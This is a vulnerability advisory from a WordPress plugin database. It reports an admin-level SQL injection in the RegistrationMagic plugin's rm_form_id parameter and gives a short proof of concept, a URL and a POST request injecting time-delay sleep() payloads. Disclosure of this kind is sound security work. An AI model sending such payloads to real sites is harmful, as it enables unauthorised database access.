WordPress Plugin Vulnerabilities
RegistrationMagic < 5.0.2.2 - Admin+ SQL Injection
Description
The plugin does not sanitise and escape the rm_form_id parameter before using it in a SQL statement in the Automation admin dashboard, allowing high privilege users to perform SQL injection attacks
Proof of Concept
As admin, https://example.com/wp-admin/admin.php?page=rm_ex_chronos_manage_tasks&rm_form_id=sleep%285%29 POST /wp-admin/admin.php?page=rm_ex_chronos_manage_tasks HTTP/1.1 Accept-Encoding: gzip, deflate Accept: */* Connection: close Cookie: [admin+] Content-Length: 19 Content-Type: application/x-www-form-urlencoded rm_form_id=sleep(1)
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
qerogram
Submitter
qerogram
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-07 (about 2 years ago)
Added
2022-02-07 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)